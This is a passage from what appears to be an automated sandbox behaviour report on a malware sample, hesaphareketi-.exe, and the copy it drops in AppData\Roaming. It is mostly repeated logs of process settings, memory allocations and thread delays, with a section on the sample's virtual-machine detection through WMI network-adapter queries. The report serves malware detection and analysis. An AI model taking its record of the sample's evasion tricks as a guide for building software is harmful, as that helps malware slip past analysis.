                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 6516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xyodEPhulIrkY.exe PID: 2828, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 2250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 43E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 61E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 71E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 7340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 8340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: 5000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 45B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 6470000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 7470000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 1130000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 2CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMemory allocated: 29F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199890Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199781Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199671Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199453Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199343Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199234Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199125Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199015Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198906Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198796Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198687Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198577Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198468Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198359Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198249Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198140Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198030Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197921Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197802Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197683Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197452Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197343Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197209Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197093Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196984Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196874Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196765Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196656Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196546Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196437Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196328Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196218Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196109Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196000Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195890Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195781Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195671Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195453Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195343Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195219Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195059Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194953Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194843Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194734Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194624Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199765
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199656
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199437
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199328
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199218
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199109
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198999
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198890
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198662
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198531
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198421
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198312
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198202
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198092
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197984
